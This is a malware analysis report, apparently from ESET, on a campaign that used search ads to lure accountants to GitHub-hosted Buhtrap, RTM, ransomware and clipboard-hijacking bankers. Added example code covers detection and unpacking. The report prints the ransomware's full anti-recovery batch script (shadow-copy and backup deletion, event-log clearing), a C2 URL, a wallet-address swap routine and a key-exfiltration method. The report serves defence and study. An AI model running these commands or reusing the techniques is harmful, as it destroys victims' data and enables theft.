To hit accountants with a cyberattack, one can use the working documents that accountants search for online. That is roughly what a cyber group has been doing over the past few months, distributing the known backdoors Buhtrap and RTM.

Buhtrap's source code leaked online in the past, so anyone can use it. We have no information about the availability of the RTM code.

This post explains how the attackers used Yandex.Direct to distribute malware hosted on GitHub. It ends with a technical analysis of the malware.
Buhtrap and RTM are back in business

Distribution mechanism and victims

The various payloads delivered to victims share a common distribution mechanism. All malicious files created by the attackers were placed in separate GitHub repositories.

Usually a repository contained a single downloadable malicious file, which changed frequently. Because GitHub lets you view a repository's change history, we can tell which malware was being distributed in a given period. To convince victims to download the malicious file, the website blanki-shabloni24[.]ru, shown in the figure below, was used.

The site's design and the names of the malicious files all follow a single concept: forms, templates, contract samples and so on. Given that Buhtrap and RTM had already been used in attacks on accountants before, the strategy of the new campaign is the same. The only question is how victims end up on the attackers' site.
Infection

At least some of the potential victims who ended up on this site were lured there by a malicious advertisement. Below is an example URL:

https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456

As the link shows, the banner was placed on the legitimate accounting forum bb.f2[.]kz. It is worth noting that banners appeared on a variety of sites, all with the same campaign ID (blanki_rsya), and most of them related to accounting or legal-support services. The URL also shows that the potential victim used the search query "download invoice form" (скачать бланк счета), which supports the targeted-attack hypothesis. Below are the sites on which banners were shown, together with the corresponding search queries.
- download invoice form – bb.f2[.]kz
- sample contract – Ipopen[.]ru
- sample claim form – 77metrov[.]ru
- contract form – blank-dogovor-kupli-prodazhi[.]ru
- sample court petition – zen.yandex[.]ru
- sample complaint – yurday[.]ru
- sample contract form – Regforum[.]ru
- contract form – Assistentus[.]ru
- sample apartment contract – napravah[.]com
- sample legal contract – avito[.]ru
The blanki-shabloni24[.]ru site appears to have been built to pass a quick visual check. An ad leading to a professional-looking site with a link to GitHub does not look obviously malicious. Moreover, the attackers uploaded malicious files to the repository only for limited periods, presumably for the duration of an ad campaign. Most of the time the GitHub repository contained an empty zip archive or an empty EXE file. The attackers could therefore distribute ads through Yandex.Direct on the sites most likely to be visited by accountants arriving in response to specific search queries.

Next, let us look at the various payloads distributed in this way.

Payload analysis

Distribution timeline

The malicious campaign began in late 2018 and was still active at the time of writing. Since the entire repository was public on GitHub, we compiled an exact timeline for the distribution of the different malware families (see the figure below). To compare it with the git history, we added a line showing when the banner links were detected, as measured by ESET telemetry. As you can see, this correlates well with the availability of payloads on GitHub. The discrepancy at the end of one month can be explained by the fact that part of the change history was missing: the repository was removed from GitHub before we could retrieve it completely.
Figure 1. Malware distribution timeline.

Code-signing certificates

Several certificates were used in the campaign. Some signed more than one malware family, which further indicates that the different samples belong to the same campaign. Although they had the private key, the operators did not sign binaries systematically and did not use the key for all samples. In 2019 the attackers also began producing invalid signatures with a Google-owned certificate for which they did not have the private key.

All certificates involved in the campaign and the malware families they signed are listed in the table below.

We also used these code-signing certificates to establish links to other malware families. For most of the certificates we found no samples that had not been distributed through the GitHub repositories. The TOV "MARIYA" certificate, however, was also used to sign malware belonging to other families.
Win32/Filecoder.Buhtrap

The first component that caught our attention was the newly discovered Win32/Filecoder.Buhtrap. It is a Delphi binary, sometimes packed, and was distributed mainly in 2019. It behaves like ransomware: it searches local drives and network shares and encrypts the files it finds. It does not need an internet connection to compromise the machine, because it does not contact a server to send encryption keys. Instead it appends a "token" to the end of the ransom note and proposes that the victim contact the operators by email or Bitmessage.

To encrypt as many sensitive sources as possible, Filecoder.Buhtrap runs a thread designed to shut down key software that may hold open handles to files containing valuable information, which could otherwise interfere with encryption. The targeted processes are mainly database management systems (DBMS). Filecoder.Buhtrap also deletes log files and backups to make data recovery harder. To do this, it runs the batch script below.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
attrib "%userprofile%\documents\Default.rdp" -s -h
del "%userprofile%\documents\Default.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
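The script above is a compact catalogue of anti-recovery and anti-forensics commands (boot recovery disabled, backup catalog and shadow copies deleted, RDP history wiped, event logs cleared and the event log service disabled). The following is an added example, not code from the original report, showing how a detection engineer might match that sequence in process-creation telemetry: one regex per technique, with an alert only when several distinct techniques fire under the same parent process, since a lone vssadmin or wbadmin call is also what backup administrators run. The log line format, host names and PIDs are constructed for the demo.

```python
import re
from collections import defaultdict

# One regex per technique seen in the Filecoder.Buhtrap batch script.
RULES = [
    ("boot_recovery_disabled",
     re.compile(r"bcdedit\b.*\b(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)", re.I)),
    ("backup_catalog_deleted",
     re.compile(r"wbadmin\b.*\bdelete\s+(catalog|systemstatebackup|backup)\b", re.I)),
    ("shadow_copies_deleted",
     re.compile(r"(vssadmin\b.*\bdelete\s+shadows|wmic\b.*\bshadowcopy\s+delete)", re.I)),
    ("rdp_history_wiped",
     re.compile(r"(reg\s+delete\b.*Terminal Server Client|\bdel\b.*Default\.rdp)", re.I)),
    ("event_logs_cleared",
     re.compile(r"wevtutil(\.exe)?\s+(cl|clear-log)\s+(Application|Security|System)\b", re.I)),
    ("eventlog_service_disabled",
     re.compile(r"\bsc\b.*\bconfig\s+eventlog\s+start\s*=\s*disabled", re.I)),
]

# Assumed (constructed) log format: "<ts> host=<h> ppid=<n> cmd=<command line>"
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+ppid=(?P<ppid>\d+)\s+cmd=(?P<cmd>.*)$")


def parse_line(line):
    """Return the fields of one process-creation event, or None if malformed."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def match_rules(cmd):
    """Names of all techniques a single command line matches."""
    return [name for name, rx in RULES if rx.search(cmd)]


def analyze(lines, min_distinct=3):
    """Group hits by (host, parent PID); report parents whose children hit at
    least `min_distinct` distinct techniques. Returns {(host, ppid): [names]}."""
    hits = defaultdict(set)
    for line in lines:
        ev = parse_line(line)
        if not ev:
            continue
        for name in match_rules(ev["cmd"]):
            hits[(ev["host"], ev["ppid"])].add(name)
    return {k: sorted(v) for k, v in hits.items() if len(v) >= min_distinct}


# Constructed sample: the script's sequence under one parent on ACC-PC-01,
# plus a lone, legitimate-looking vssadmin call on a backup server.
SAMPLE_LOG = [
    "2019-03-04T09:12:01Z host=ACC-PC-01 ppid=4120 cmd=bcdedit /set {default} recoveryenabled no",
    "2019-03-04T09:12:01Z host=ACC-PC-01 ppid=4120 cmd=wbadmin delete catalog -quiet",
    "2019-03-04T09:12:02Z host=ACC-PC-01 ppid=4120 cmd=vssadmin delete shadows /all /quiet",
    r'2019-03-04T09:12:02Z host=ACC-PC-01 ppid=4120 cmd=reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f',
    "2019-03-04T09:12:03Z host=ACC-PC-01 ppid=4120 cmd=wevtutil.exe clear-log Security",
    "2019-03-04T09:12:03Z host=ACC-PC-01 ppid=4120 cmd=sc config eventlog start=disabled",
    "2019-03-04T23:00:00Z host=BKP-SRV ppid=777 cmd=vssadmin delete shadows /for=D: /oldest",
    "2019-03-04T23:00:05Z host=BKP-SRV ppid=777 cmd=wbadmin get versions",
]

if __name__ == "__main__":
    for key, names in analyze(SAMPLE_LOG).items():
        print("ALERT", key, names)
```

The per-parent aggregation is the important design choice: each individual command has benign uses, but a single parent spawning shadow-copy deletion, backup catalog deletion, boot recovery changes and log clearing within seconds has no legitimate counterpart.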
Filecoder.Buhtrap uses the legitimate online IP Logger service, which is designed to collect information about website visitors, in order to track the ransomware's victims. The following command line is responsible for this (the markup passed to document.write(), which referenced the tracking image, is not preserved on this page):
mshta.exe "javascript:document.write('');"
Files are selected for encryption if they do not match any of three exclusion lists. First, files with the extensions .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys and .bat are not encrypted. Second, all files whose full path contains one of the directory strings in the list below are excluded.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
google\chrome
google
boot
application data
apple computer\safari
appdata
all users
:\windows
:\system volume information
:\nvidia
:\intel
Third, certain file names are excluded from encryption, among them the name of the ransom note file. The list is shown below. Clearly all of these exceptions are meant to keep the machine bootable, but with minimal usability.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
File encryption scheme

When the malware runs, it generates a 512-bit RSA key pair. The private exponent (d) and modulus (n) are then encrypted with a hardcoded 2048-bit public key (public exponent and modulus), zlib-compressed and base64-encoded. The code responsible for this is shown in Figure 2.

Figure 2. Hex-Rays decompilation of the 512-bit RSA key pair generation routine.

Below is an example of the plaintext containing the generated private key (the token attached to the ransom note).
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
The attackers' public exponent e and modulus n are hardcoded in the binary.

Files are encrypted with AES in CBC mode. Note that the report gives the key length as 128 bits while naming the cipher AES-256-CBC, which is inconsistent (AES-256 implies a 256-bit key), so the key length should be confirmed against the sample. A new key and a new initialization vector are generated for each encrypted file. The key information is appended to the end of the encrypted file. Let us look at the format of an encrypted file.

Encrypted files have the following layout. The original file data, with the VEGA magic value added, is encrypted up to the first 0x5000 bytes only. All of the information needed for decryption is appended to the file in the following structure:

- File size marker: contains a flag indicating whether the file size exceeds 0x5000 bytes
- AES key blob = ZlibCompress(RSAEncrypt(AES key + IV, public key of the generated RSA key pair))
- RSA key blob = ZlibCompress(RSAEncrypt(generated RSA private key, hardcoded RSA public key))
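The scheme above is a two-layer key wrap: every file key is protected by a per-infection 512-bit RSA key, whose private half is in turn protected by the attackers' hardcoded 2048-bit public key, so only the holder of the attackers' private key can walk the chain back to the file keys. The following is an added example, not code from the sample or the original report, that models exactly that chain with textbook RSA built from the Python standard library. Assumptions not stated on the page: no RSA padding, a big-endian d||n layout for the private-key blob, a little-endian footer layout, and a randomly generated "hardcoded" attacker key. AES itself is not in the standard library, so the 48-byte key+IV is only carried, not used. Two points a responder should take from it: the footer holds everything needed for decryption except the attackers' private key, and 512-bit RSA moduli have been factorable with modest resources for years, so if the victim's 512-bit modulus can be recovered, factoring it yields d and therefore every file key without any help from the operators.

```python
import base64
import secrets
import struct
import zlib

FILE_SIZE_LIMIT = 0x5000  # only the first 0x5000 bytes of a file are encrypted


def is_probable_prime(n, rounds=8):
    """Miller-Rabin primality test (adequate for demo key generation)."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        x = pow(secrets.randbelow(n - 3) + 2, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def gen_prime(bits):
    """Random prime with the top two bits set so p*q has exactly 2*bits bits."""
    while True:
        c = secrets.randbits(bits) | (3 << (bits - 2)) | 1
        if is_probable_prime(c):
            return c


def gen_rsa(bits, e=65537):
    """Return ((e, n), (d, n)); modulus length is exactly `bits`."""
    while True:
        p, q = gen_prime(bits // 2), gen_prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e:  # e is prime, so phi % e != 0 means gcd == 1
            return (e, p * q), (pow(e, -1, phi), p * q)


def rsa_raw(data, key):
    """Textbook (unpadded) RSA; output is zero-padded to the modulus size."""
    exp, n = key
    m = int.from_bytes(data, "big")
    if m >= n:
        raise ValueError("message too large for modulus")
    return pow(m, exp, n).to_bytes((n.bit_length() + 7) // 8, "big")


def wrap_file_key(aes_key_iv, victim_pub):
    """AES key blob = ZlibCompress(RSAEncrypt(key || IV, generated public key))."""
    return zlib.compress(rsa_raw(aes_key_iv, victim_pub))


def wrap_private_key(victim_priv, attacker_pub):
    """RSA key blob = ZlibCompress(RSAEncrypt(d || n, hardcoded public key))."""
    d, n = victim_priv
    return zlib.compress(rsa_raw(d.to_bytes(64, "big") + n.to_bytes(64, "big"), attacker_pub))


def make_token(rsa_key_blob):
    """The base64 'token' the ransom note asks the victim to send."""
    return base64.b64encode(rsa_key_blob).decode()


def build_footer(orig_size, aes_key_blob, rsa_key_blob):
    """Trailer appended to each encrypted file (field order from the page; encoding assumed)."""
    big = 1 if orig_size > FILE_SIZE_LIMIT else 0
    return (struct.pack("<B", big)
            + struct.pack("<I", len(aes_key_blob)) + aes_key_blob
            + struct.pack("<I", len(rsa_key_blob)) + rsa_key_blob)


def parse_footer(footer):
    big, pos = footer[0], 1
    (l1,) = struct.unpack_from("<I", footer, pos); pos += 4
    aes_blob = footer[pos:pos + l1]; pos += l1
    (l2,) = struct.unpack_from("<I", footer, pos); pos += 4
    return big, aes_blob, footer[pos:pos + l2]


def recover_file_key(token, aes_key_blob, attacker_priv):
    """The operators' side: unwrap d||n with the hardcoded private key, then the file key."""
    blob = rsa_raw(zlib.decompress(base64.b64decode(token)), attacker_priv)[-128:]
    victim_priv = (int.from_bytes(blob[:64], "big"), int.from_bytes(blob[64:], "big"))
    return rsa_raw(zlib.decompress(aes_key_blob), victim_priv)[-48:]


def demo():
    attacker_pub, attacker_priv = gen_rsa(2048)  # hardcoded in the real sample
    victim_pub, victim_priv = gen_rsa(512)       # generated on each infection
    key_iv = secrets.token_bytes(32 + 16)        # stands in for AES key + IV
    footer = build_footer(0x6000, wrap_file_key(key_iv, victim_pub),
                          wrap_private_key(victim_priv, attacker_pub))
    big, aes_blob, rsa_blob = parse_footer(footer)
    return big == 1 and recover_file_key(make_token(rsa_blob), aes_blob, attacker_priv) == key_iv
```

Unpadded RSA on structured plaintext is shown here only because the page does not describe the sample's padding; a real deployment would use OAEP, and the demo should not be read as a statement about how the sample pads.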
Win32/ClipBanker

Win32/ClipBanker is a component that was distributed intermittently in late 2018. Its role is to monitor the contents of the clipboard and look for cryptocurrency wallet addresses. When it identifies a target wallet address, ClipBanker replaces it with an address believed to belong to the operators. The samples we examined were neither packed nor obfuscated. The only mechanism used to mask the behavior is string encryption: the operators' wallet addresses are RC4-encrypted. The targeted cryptocurrencies are Bitcoin, Bitcoin Cash, Dogecoin, Ethereum and Ripple.

Only small amounts were transferred to the attackers' Bitcoin wallets during the period the malware was spreading, which casts doubt on the campaign's success. Moreover, there is no evidence that those transactions are related to ClipBanker at all.

Win32/RTM

The Win32/RTM component was distributed for a few days in early 2019. RTM is a banking trojan written in Delphi that targets remote banking systems. In 2017, ESET researchers published a paper on it.
Buhtrap loader

For some time, a downloader that did not resemble previous Buhtrap tools was available on GitHub. It contacts https://94.100.18[.]67/RSS.php?<some_id>, retrieves the next stage and loads it directly into memory. Two behaviors of the second-stage code can be distinguished. In the first, RSS.php returned the Buhtrap backdoor directly; this backdoor is very similar to the one that became available after the source code leak.

Interestingly, we see several campaigns using the Buhtrap backdoor that are believed to be run by different operators. The main difference here is that the backdoor is loaded directly into memory and does not use the usual scheme with the DLL deployment process described earlier.

The second, more complex behavior was that the RSS.php URL was passed to another loader. It implemented some obfuscation, such as rebuilding the dynamic import table. The purpose of this loader is to connect to the C&C server.

Android/Spy.Banker

Interestingly, an Android component was also found in the GitHub repository. It was in the master branch for only one day in 2018. Apart from its presence on GitHub, ESET telemetry found no evidence that this malware was distributed.

The component was hosted as an Android application package (APK). It is heavily obfuscated. The malicious behavior is hidden in an encrypted JAR inside the APK, encrypted with RC4 using the following key:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
The same key and algorithm are used for string encryption. The JAR is located at APK_ROOT + image/files. The first 4 bytes of that file hold the length of the encrypted JAR, which begins immediately after the length field.
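The container format just described (a 4-byte length, then the RC4-encrypted JAR, with the same key reused for string decryption) is simple enough to unpack by hand. The following is an added example, not the malware's or the original report's code, that implements RC4 from scratch, rebuilds the container around a constructed stand-in JAR, and then parses it back with the key listed above. The byte order of the length field is not stated on the page; little-endian is assumed.

```python
import io
import struct
import zipfile

# RC4 key as listed on the page.
KEY = bytes([
    0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
    0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
    0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96,
])


def rc4(key, data):
    """Plain RC4 (KSA then PRGA); encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(b ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def unpack_jar(container, key=KEY):
    """Parse image/files: little-endian length (assumed), then the RC4 JAR.
    The ZIP local-header magic is checked so a wrong key fails loudly."""
    if len(container) < 4:
        raise ValueError("container too short")
    (length,) = struct.unpack("<I", container[:4])
    if length > len(container) - 4:
        raise ValueError("length field exceeds container size")
    jar = rc4(key, container[4:4 + length])
    if jar[:4] != b"PK\x03\x04":
        raise ValueError("decrypted payload is not a ZIP/JAR (wrong key or layout?)")
    return jar


def pack_jar(jar, key=KEY):
    """Inverse of unpack_jar; used here only to build the constructed container."""
    return struct.pack("<I", len(jar)) + rc4(key, jar)


def decrypt_string(blob, key=KEY):
    """Strings in the sample use the same key and algorithm as the JAR."""
    return rc4(key, blob).decode("utf-8")


def build_sample_jar():
    """Constructed stand-in JAR: a ZIP with a manifest and a dummy class entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        zf.writestr("com/example/Loader.class", b"\xca\xfe\xba\xbe" + b"\x00" * 16)
    return buf.getvalue()


def jar_entries(jar):
    """List the entries of a recovered JAR."""
    return zipfile.ZipFile(io.BytesIO(jar)).namelist()


if __name__ == "__main__":
    container = pack_jar(build_sample_jar())
    print(jar_entries(unpack_jar(container)))
```

On a real APK the same unpack_jar call is applied to the bytes of image/files; the magic check is what tells you whether the key or the assumed length encoding is wrong.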
Once decrypted, the file turned out to be Anubis, an Android banker. Its capabilities include:

- microphone recording
- taking screenshots
- obtaining GPS coordinates
- keylogging
- encrypting device data and demanding a ransom
- sending spam

Interestingly, the banker used Twitter as a backup communication channel for obtaining another C&C server. The sample we analyzed used the @JonesTrader account, which had already been blocked at the time of analysis.

The banker contains a list of target applications on the Android device. It is longer than the list obtained in Sophos's research. The list includes many banking applications, online shopping programs such as Amazon and eBay, and cryptocurrency services.

MSIL/ClipBanker.IH

The last component distributed as part of this campaign was a .NET Windows executable that appeared in 2019. Most of the versions we examined were packed with ConfuserEx v1.0.0. Like ClipBanker, this component uses the clipboard. Its targets are a wide range of cryptocurrencies and Steam trade offers. It also uses the IP Logger service to steal Bitcoin private keys in WIF format.

Protection mechanisms

Besides the protection ConfuserEx provides against debugging, dumping and tampering, the malware itself has the ability to detect antivirus products and virtual machines.
To check whether it is running in a virtual machine, the malware uses the built-in Windows WMI command-line tool (WMIC) to request BIOS information, namely:
wmic bios
The program then parses the command output, searching for the keywords VBOX, VirtualBox, XEN, qemu, bochs and VM.

To detect antivirus products, the malware sends a Windows Management Instrumentation (WMI) query to the Windows Security Center through the ManagementObjectSearcher API, as shown below. After base64 decoding, the call looks like this:

ManagementObjectSearcher('root\SecurityCenter2', 'SELECT * FROM AntivirusProduct')
Figure 3. Antivirus product detection routine.

The malware performs further checks as well.

Persistence

The version of the malware we examined copies itself to %APPDATA%\google\updater.exe and sets the "hidden" attribute on the google directory. It then modifies the value Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell in the Windows registry, adding the path to updater.exe. As a result, the malware runs every time the user logs in.

Malicious behavior

Like ClipBanker, this malware monitors the clipboard for cryptocurrency wallet addresses and, when it finds one, replaces it with one of the operators' addresses. Below is the list of targeted address types, based on what was found in the code.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
Each address type has a corresponding regular expression. The STEAM_URL value is used to attack the Steam system, as can be seen from the regular expression that defines it in the buffer:
\b(https://|http://|)steamcommunity\.com/tradeoffer/new/\?partner=[0-9]+&token=[a-zA-Z0-9]+\b
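Clipboard hijacking of this kind is easy to model, and modelling it also shows what a defender can check. The following is an added example, not the malware's or the original report's code: it classifies clipboard text against a few address patterns, performs the substitution the clipper performs, and implements the defensive counterpart (compare what was copied with what was pasted). Only a handful of the address types listed above are covered; apart from STEAM_URL, which is the page's own regex with its backslashes restored, the patterns are my approximations, and the operator and victim addresses are constructed placeholders.

```python
import re

PATTERNS = {
    "BTC_P2PKH": re.compile(r"\b1[1-9A-HJ-NP-Za-km-z]{25,34}\b"),
    "BTC_P2SH": re.compile(r"\b3[1-9A-HJ-NP-Za-km-z]{25,34}\b"),
    "BTC_BECH32": re.compile(r"\bbc1[02-9ac-hj-np-z]{25,60}\b"),
    "ETH_ERC20": re.compile(r"\b0x[0-9a-fA-F]{40}\b"),
    "XMR": re.compile(r"\b4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}\b"),
    # Steam trade-offer URL pattern as given on the page.
    "STEAM_URL": re.compile(
        r"\b(https://|http://|)steamcommunity\.com/tradeoffer/new/\?partner=[0-9]+&token=[a-zA-Z0-9]+\b"),
}

# Constructed placeholders standing in for the operators' (RC4-encrypted) addresses.
OPERATOR_ADDRS = {
    "BTC_P2PKH": "1" + "2" * 33,
    "ETH_ERC20": "0x" + "a" * 40,
    "STEAM_URL": "https://steamcommunity.com/tradeoffer/new/?partner=999999&token=AtTaCkEr",
}


def classify(text):
    """Names of the address types present in the clipboard text."""
    return [name for name, rx in PATTERNS.items() if rx.search(text)]


def hijack(clipboard, operator=OPERATOR_ADDRS):
    """The clipper's behavior: every recognised address for which the operator
    has a replacement is swapped; everything else passes through untouched."""
    out = clipboard
    for name, rx in PATTERNS.items():
        if name in operator:
            out = rx.sub(lambda m, a=operator[name]: a, out)
    return out


def _addresses(text, rx):
    return [m.group(0) for m in rx.finditer(text)]


def detect_swap(copied, pasted):
    """Defensive counterpart: address types whose value changed between the
    copy and the paste (what a wallet, browser extension or EDR rule can check)."""
    return [name for name, rx in PATTERNS.items()
            if _addresses(copied, rx) != _addresses(pasted, rx)]


if __name__ == "__main__":
    note = "please send 0.5 BTC to " + "1" + "3" * 33 + " today"  # constructed victim address
    print(hijack(note))
    print(detect_swap(note, hijack(note)))
```

The swap is silent from the user's point of view because the replacement has the same shape as the original; comparing copied and pasted values, or confirming the first and last characters of an address before sending, is the practical mitigation.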
Exfiltration channel

Besides replacing addresses in the clipboard, this malware targets the WIF private keys of Bitcoin, Bitcoin Core and Electrum Bitcoin wallets. The program uses iplogger.org as the exfiltration channel for the WIF private keys. To do this, the operators place the private key data in the User-Agent HTTP header, as shown below.

Figure 4. IP Logger console with exfiltrated data.

The operators did not use iplogger.org to exfiltrate the wallets themselves. They probably relied on another method because of the 255-character limit of the User-Agent field as displayed in the IP Logger web interface. In the samples we examined, the other output server was stored in the DiscordWebHook environment variable. Surprisingly, this environment variable is not assigned anywhere in the code. This suggests that the malware is still under development and that the variable is set on the operator's test machine.

There is another sign that the program is under development. The binary contains two iplogger.org URLs, and both are queried when data is exfiltrated. Requests to one of these URLs carry "DEV /" in front of the Referer field value. In a version not packed with ConfuserEx, the recipient of this URL is named DevFeedbackUrl. Judging by the environment variable name, the operator likely plans to use the legitimate Discord service and its webhook system to steal cryptocurrency wallets.

Conclusion

This campaign is an example of legitimate advertising services being used in cyberattacks. The scheme targets Russian organizations, but it would not be surprising to see such an attack using non-Russian services. To avoid compromise, users need to be confident in the reputation of the source of the software they download.

A full list of indicators of compromise and MITRE ATT&CK attributes is available from the original publication.

Source: habr.com